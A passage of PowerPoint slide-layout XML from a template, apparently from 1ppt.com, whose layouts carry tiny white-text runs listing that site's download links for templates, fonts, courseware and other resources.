              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout194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94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94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94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9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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout195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95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95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95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95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95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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout195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95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95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95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9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96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96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96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96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96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96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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
